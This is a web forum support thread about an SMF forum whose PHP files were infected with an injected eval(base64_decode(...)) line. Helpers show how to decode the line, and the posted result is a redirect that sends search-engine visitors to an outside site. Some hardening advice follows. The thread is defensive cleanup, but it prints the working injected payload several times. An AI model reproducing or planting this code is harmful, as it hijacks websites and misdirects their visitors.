Topic:  at the beginning of php files

[T3CHN0]

Hello


Can anyone tell me what this is in front of my php files.
Display.template.php and load.php so far that's the php files I have noticed it.

Code: [Select]

<?php
/**
 * Simple Machines Forum (SMF)

I am going to remove it so it looks like this

Code: [Select]

<?php
/**
 * Simple Machines Forum (SMF)

I hope I don't get any problems doing so.
but please anyone let me know

Code: [Select]

if 

should it be in my files


cheers

[emanuele]

No, it shouldn't be in your files at all.
It's fine to remove these chars.

Did you by install any mod?

[T3CHN0]

Hello
Yes I have installed many mods, My forum was attacked by a leaching rouge and all my files had
something like this at the beginning of each php file

Code: [Select]

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQodirecly after <?php

I upgraded my site from 2.0 rc3 to 2.0 last week but was attacked again 2 days after.
so I rebuild the hole 2.0 forum again fresh with new install but after removing

Code: [Select]



within about 30minutes later I noticed files started having the

Code: [Select]

eval(base64_decode(again and not long after every php file I edit was leached again.

I have turned on with my host leach security to try stop this from happening again
but any other idea's to protect my site would be appreciated


at this point in time I am going over every file in my forum 1 by 1 and removing the leach string
to try and recover my forum without having to rebuild another time.


cheers

[kat]

Maybe... This?

http://custom.simplemachines.org/mods/index.php?mod=2815

I'm curious as to how they keep getting in, though.

Has your host checked their access logs and stuff?

Are they a good host?

[T3CHN0]

Thankyou so much for that link to firewall mod, never thought of searching for a firewall mod

I'm with bluehost and I have never had a problem with them in the passed.
good speeds and allot of room for data.


they probably haven't checked access logs and stuff, am I able to do it?

how they keep getting in "Well only a matter of time before a hack is made" that's what we can expect
with anything in our days. I don't know how but it keeps getting in.

I do set all my files permissions to 755 - would that allow access?

here is the complete leach string and anyone knows how to decode it and find out where it's directed at

Code: [Select]

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsNCglleGl0KCk7DQp9DQp9DQoJfQ0KCX0="));


[MrPhil]

Change "eval" to "print" and it should display the code inside, rather than running it. You probably won't like what you see, but it might give you a hint as to how they're getting in. Not only should you clean up all SMF files, but erase all other files on your site that you can't account for. Scan all PCs used to administer your site for spyware and viruses (especially keystroke loggers and password sniffers). Then change all passwords -- FTP, site control panel, SMF admin IDs, etc. Talk to your host about access logs and see if they can see someone getting in.

[T3CHN0]

Thanks.
I will do all of what you said.


by the way, where would I put the string with print to see anything.
in a empty php file?

[T3CHN0]

don't know if this info is any good.
but cleaning my files and i'm back in my themes/default folder and see

Code: [Select]

 is back in my Display.template.php file
that means what ever it is will keep coming back.


How do I stop that happening?

[kat]

I do set all my files permissions to 755 - would that allow access?

I believe that is like having a big notice on your site saying "Please hack me!". (Well, not quite that bad, but...)

Go to Admin>Packages>File permissions.

Set that to "Standard" and I think you'll be better off.

[Illori]

K@ no, 777 is world write/readable 755 is not.

[kat]

Yeah, I know.

Would you leave your forum with every file at 775, though?

[Illori]

they said 755 not 775, 755 is REQUIRED by many servers that are more _secure_. 755 keeps others from being able to view your folders, but files need to be 644 not 755.

[MrPhil]

by the way, where would I put the string with print to see anything.
in a empty php file?

Code: [Select]

<?php
print(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsNCglleGl0KCk7DQp9DQp9DQoJfQ0KCX0="));
?>


[MrPhil]

they said 755 not 775, 755 is REQUIRED by many servers that are more _secure_. 755 keeps others from being able to view your folders, but files need to be 644 not 755.

K@ needs a new pair of reading glasses...

[kat]

You're right, there.

I DID read it as 775.

I blame Runic for late nights in wet fields.

[T3CHN0]

755 keeps others from being able to view your folders, but files need to be 644 not 755.

So simply, all folders should be 755 and all php files 644


I still can't Go to Admin>Packages>File permissions. to set file permission as my forum is still down.
I will do the permissions my self.

I have almost finished removing all leaches and will put my new user name and password
into settings soon to test it and see if my forum is working again.

[T3CHN0]

by the way, where would I put the string with print to see anything.
in a empty php file?

Code: [Select]

<?php
print(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsNCglleGl0KCk7DQp9DQp9DQoJfQ0KCX0="));
?>


I did this and this is what I got.
means nothing to me

Code: [Select]

error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://prsnbrk.osa.pl/"); exit(); } } } }

Well I did everything said. forum firewall installed and forum back up and running with all leaching removed.
I will monitor my site as always and if anything happens like this again I will reply
and post to the thread if that's ok


cheers

[MrPhil]

I did this and this is what I got.
means nothing to me

It means that if any of many popular search engines sent someone to your site, what they will see is some Polish site instead. You've been hijacked.

[T3CHN0]

WOW. thanks for that... hopefully with forum firewall mod,  Bad Behavior mod, stop spammers mod, and leach protection from
my host that none of this will happen again...

[Illori]

that will only work if the code you are using is secure and your server is secure. those mods alone will not stop hackers.